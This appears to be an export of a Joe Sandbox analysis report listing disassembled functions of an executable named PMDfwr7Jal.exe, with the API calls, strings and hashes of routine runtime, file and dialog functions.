Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5d2ede826ba305ae0367136b152b8b5556241c86f4230893e250851a425a9320
Instruction ID: c4368f38fab2f50df6c6904b355c09b99dfdcceca5d9928a9459af3fab6daf3b
Opcode Fuzzy Hash: 5d2ede826ba305ae0367136b152b8b5556241c86f4230893e250851a425a9320
Instruction Fuzzy Hash: 4A41DF72A00304DFEB24DF78C885A5EB7B5EF89724F1585A9E515EB242EB35AD01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0073B610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0073B619
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0073B63C

Part of subcall function 00738518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0073C13D,00000000,?,007367E2,?,00000008,?,007389AD,?,?,?), ref: 0073854A

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0073B662
_free.LIBCMT ref: 0073B675
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0073B684

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: d465d53a40ba14c1f3437d218a7f2a257c974cf0679f7af1a457e49756edae19
Instruction ID: 8373bd13085c920febe394e61c83b6bd7fbb65052e36682081067057ea8a2e09
Opcode Fuzzy Hash: d465d53a40ba14c1f3437d218a7f2a257c974cf0679f7af1a457e49756edae19
Instruction Fuzzy Hash: 8201D476601615FF77211A766C8EC7B6A6DEEC7BA07144229BA04C3113DF788D0181B0

Uniqueness

Uniqueness Score: -1.00%

Function 0072075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 00720A41: ResetEvent.KERNEL32(?), ref: 00720A53
Part of subcall function 00720A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00720A67

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0072078F
CloseHandle.KERNEL32(?,?), ref: 007207A9
DeleteCriticalSection.KERNEL32(?), ref: 007207C2
CloseHandle.KERNEL32(?), ref: 007207CE
CloseHandle.KERNEL32(?), ref: 007207DA

Part of subcall function 0072084E: WaitForSingleObject.KERNEL32(?,000000FF,00720A78,?), ref: 00720854
Part of subcall function 0072084E: GetLastError.KERNEL32(?), ref: 00720860

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 523cd9c4098f40692c24345e0245984f5623b31e8ee5471a1c08686c7355ab92
Instruction ID: 7650472e18f7003d766f0ee03d345d36666cbb10afef48c5a7060b0fa6e5a022
Opcode Fuzzy Hash: 523cd9c4098f40692c24345e0245984f5623b31e8ee5471a1c08686c7355ab92
Instruction Fuzzy Hash: 0201F576000704EFCB319B24EC84FC6BBFAFB49710F00461AF15E42161CB7A6A44CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0073BF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0073BF28

Part of subcall function 007384DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0073BFA7,?,00000000,?,00000000,?,0073BFCE,?,00000007,?,?,0073C3CB,?), ref: 007384F4
Part of subcall function 007384DE: GetLastError.KERNEL32(?,?,0073BFA7,?,00000000,?,00000000,?,0073BFCE,?,00000007,?,?,0073C3CB,?,?), ref: 00738506

_free.LIBCMT ref: 0073BF3A
_free.LIBCMT ref: 0073BF4C
_free.LIBCMT ref: 0073BF5E
_free.LIBCMT ref: 0073BF70

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4d5150a848f80c468fbca6f7fcbaa5abf180c49959afc31b8287d95daa28cacc
Instruction ID: 4693314d063a1b3e85074623f4ac2882aed66da9812de38d306fe98efe7b21f4
Opcode Fuzzy Hash: 4d5150a848f80c468fbca6f7fcbaa5abf180c49959afc31b8287d95daa28cacc
Instruction Fuzzy Hash: BFF06837A04345E7A6A0DF54EDCAD1673D9BA04360B559806F108D7D13CB3CFC404E55

Uniqueness

Uniqueness Score: -1.00%

Function 007376BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\PMDfwr7Jal.exe,00000104), ref: 007376FD
_free.LIBCMT ref: 007377C8
_free.LIBCMT ref: 007377D2

Strings

C:\Users\user\Desktop\PMDfwr7Jal.exe, xrefs: 007376F4, 007376FB, 0073772A, 00737762

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\PMDfwr7Jal.exe
API String ID: 2506810119-2771706215
Opcode ID: bc4a54a78d7eb7d0fa563510dd930113885299ebc935b8f6667bb89e4e88dd29
Instruction ID: 80d8da22a273a0eb0d18c83d60ea5c25b7c7b4ee56155c37ba45139f8ba7e5f8
Opcode Fuzzy Hash: bc4a54a78d7eb7d0fa563510dd930113885299ebc935b8f6667bb89e4e88dd29
Instruction Fuzzy Hash: 053193B1A04218EFEB25DF99DC8599EBBFCEB85750F144066F408D7602DA785E40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00717574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00717579

Part of subcall function 00713B3D: __EH_prolog.LIBCMT ref: 00713B42

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00717640

Part of subcall function 00717BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00717C04
Part of subcall function 00717BF5: GetLastError.KERNEL32 ref: 00717C4A
Part of subcall function 00717BF5: CloseHandle.KERNEL32(?), ref: 00717C59

Strings

SeSecurityPrivilege, xrefs: 007175BE
SeRestorePrivilege, xrefs: 007175D3

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 7b3efb3888422103abc4144ad5cb96f4a70962bad669fbc608e38864511c0022
Instruction ID: 00a4a6984971ee96d4b10883bfe910107e7905e4c4238b3babbf5c4f39c90b0c
Opcode Fuzzy Hash: 7b3efb3888422103abc4144ad5cb96f4a70962bad669fbc608e38864511c0022
Instruction Fuzzy Hash: A431C471908258EEDF20EB6CDC4ABEE7B79AF15354F004159F448AB1D2DBBC4A84C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0072A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0071130B: GetDlgItem.USER32(00000000,00003021), ref: 0071134F
Part of subcall function 0071130B: SetWindowTextW.USER32(00000000,007435B4), ref: 00711365

EndDialog.USER32(?,00000001), ref: 0072A4B8
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0072A4CD
SetDlgItemTextW.USER32(?,00000066,?), ref: 0072A4E2

Strings

ASKNEXTVOL, xrefs: 0072A448

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 3733871fce207c0d872bd42559be73be1d12678358b1f150e04d5ea198858a2a
Instruction ID: a36758d0058e9735fb283dc69a51514bd47b557e799dc39df032e4369cf8908c
Opcode Fuzzy Hash: 3733871fce207c0d872bd42559be73be1d12678358b1f150e04d5ea198858a2a
Instruction Fuzzy Hash: B511B1322402A0FFE721AFACAD4DFA637A9AB4B340F104105F2449A0A1C7ADD841D776

Uniqueness

Uniqueness Score: -1.00%

Function 0071D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0071D22E
_strncpy.LIBCMT ref: 0071D278

Strings

$%s, xrefs: 0071D223
@%s, xrefs: 0071D218

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: __fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 1857242416-834177443
Opcode ID: dc2807c16beb3761c4dc0a672ed62fc5904aef19228b40f87dae4200143254b7
Instruction ID: 72b4e567f687f46d44125fed5356b8d52000ef1bb2321d2986570c62e876ddd5
Opcode Fuzzy Hash: dc2807c16beb3761c4dc0a672ed62fc5904aef19228b40f87dae4200143254b7
Instruction Fuzzy Hash: F7214F72540248AAEB31DEA8DC4AFEA7BA8BB05300F040512FA1596192E379EA95DF51

Uniqueness

Uniqueness Score: -1.00%

Function 0071B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0071B51E

Part of subcall function 0071400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0071401D

_wcschr.LIBVCRUNTIME ref: 0071B53C
_wcschr.LIBVCRUNTIME ref: 0071B54C

Strings

%c:\, xrefs: 0071B514

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: 63e3ec7baeec07f18c0483421dc3d580af69ddfc4499f840d6c405bba23aab2f
Instruction ID: 1699a7dff1a6168acf18476d3917928c650ea6a4fc7866fdf68ba465a9127e9c
Opcode Fuzzy Hash: 63e3ec7baeec07f18c0483421dc3d580af69ddfc4499f840d6c405bba23aab2f
Instruction Fuzzy Hash: 9C01B953904311FAD7206B7D9C8ADABB7ADDE957A0B904416F945C60C2FB28D9A0C2F1

Uniqueness

Uniqueness Score: -1.00%

Function 007206BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0071ABC5,00000008,?,00000000,?,0071CB88,?,00000000), ref: 007206F3
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0071ABC5,00000008,?,00000000,?,0071CB88,?,00000000), ref: 007206FD
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0071ABC5,00000008,?,00000000,?,0071CB88,?,00000000), ref: 0072070D

Strings

Thread pool initialization failed., xrefs: 00720725

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 02ca0a1e0947617da7470e138ef8572d69e6727d44476c094b76610ac6ea1908
Instruction ID: 9ed9227de935698cc19916bc724b4d557e01e71a586e3f26e2b1a6fcbe59702a
Opcode Fuzzy Hash: 02ca0a1e0947617da7470e138ef8572d69e6727d44476c094b76610ac6ea1908
Instruction Fuzzy Hash: D111A0B1500708AFC3305F65D888AA7FBECFB95745F10492EF1DA82201D7B96980CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0072D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 0072D3C9, 0072D3FD
RENAMEDLG, xrefs: 0072D3DE

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: f2c85fabc3e3ab10d498c42aab03dd7bc2d2ecaff462d58b64e652f0f280275a
Instruction ID: c70ac5c43f4d1134d9a8e28b96db1e1edff66a554ae69f2f2228bd4403a269c6
Opcode Fuzzy Hash: f2c85fabc3e3ab10d498c42aab03dd7bc2d2ecaff462d58b64e652f0f280275a
Instruction Fuzzy Hash: 6A01B171A003E9AFCB619F14FC04E963FA9F714381B148421FC05A2231C6BD9C50EBA6

Uniqueness

Uniqueness Score: -1.00%

Function 007391DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00739269
__alldvrm.LIBCMT ref: 0073946A
__alldvrm.LIBCMT ref: 0073948C

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
Instruction ID: 309473c88b95e6f3120175f388a6cc072726499d7335c718b24ff2ca0989822b
Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
Instruction Fuzzy Hash: 42A157729047869FFB21CE68C8917AFBBE5EF55310F18416DE6859B283C2BC9D42C750

Uniqueness

Uniqueness Score: -1.00%

Function 0071A2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,007180B7,?,?,?), ref: 0071A351
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,007180B7,?,?), ref: 0071A395
SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,007180B7,?,?,?,?,?,?,?,?), ref: 0071A416
CloseHandle.KERNEL32(?,?,00000000,?,007180B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0071A41D

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 1ab50e96ec8c32cbc440b3e2ac7a6034e0a3922041b2b658d7b308bb7683d646
Instruction ID: 7c562234a1d2c42997a9cca197d2e06034eb5ee34aa29fc591259af9b9339bd0
Opcode Fuzzy Hash: 1ab50e96ec8c32cbc440b3e2ac7a6034e0a3922041b2b658d7b308bb7683d646
Instruction Fuzzy Hash: DC41CC31249381AAE731DF28DC49BEEBBE8AF85700F14091DB5E0D31D1D6789A889B53

Uniqueness

Uniqueness Score: -1.00%

Function 0073C099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,007389AD,?,00000000,?,00000001,?,?,00000001,007389AD,?), ref: 0073C0E6
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0073C16F
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,007367E2,?), ref: 0073C181
__freea.LIBCMT ref: 0073C18A

Part of subcall function 00738518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0073C13D,00000000,?,007367E2,?,00000008,?,007389AD,?,?,?), ref: 0073854A

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 1cc1888e13f9629ed0c2323bcd41bf201b80f737f5d26872054b7fd5676dfa06
Instruction ID: a1e262d8c252cc7f91e1ed89e4093fd0cde41735bff8ec331f07f32968aa560d
Opcode Fuzzy Hash: 1cc1888e13f9629ed0c2323bcd41bf201b80f737f5d26872054b7fd5676dfa06
Instruction Fuzzy Hash: 6031D0B2A0021AABEF269F64DC45DAE7BA5EB44710F144129FC04EB152EB39CD50DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00729DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00729DBE
GetDeviceCaps.GDI32(00000000,00000058), ref: 00729DCD
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00729DDB
ReleaseDC.USER32(00000000,00000000), ref: 00729DE9

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 0618a6af631426e71865084eda4fda02c628132667da741b8d6d42a80294b3a2
Instruction ID: 5d49594e38b936980c4d602f470ea89cecc7c63f2cda0f087fe99bb27b3a41f3
Opcode Fuzzy Hash: 0618a6af631426e71865084eda4fda02c628132667da741b8d6d42a80294b3a2
Instruction Fuzzy Hash: 97E08C31A81721A7C3601BA1BC0DF8B3B14FB09793F048000FB1AA6190EAB84482CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00732016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00732016
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0073201B
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00732020

Part of subcall function 0073310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0073311F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00732035

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
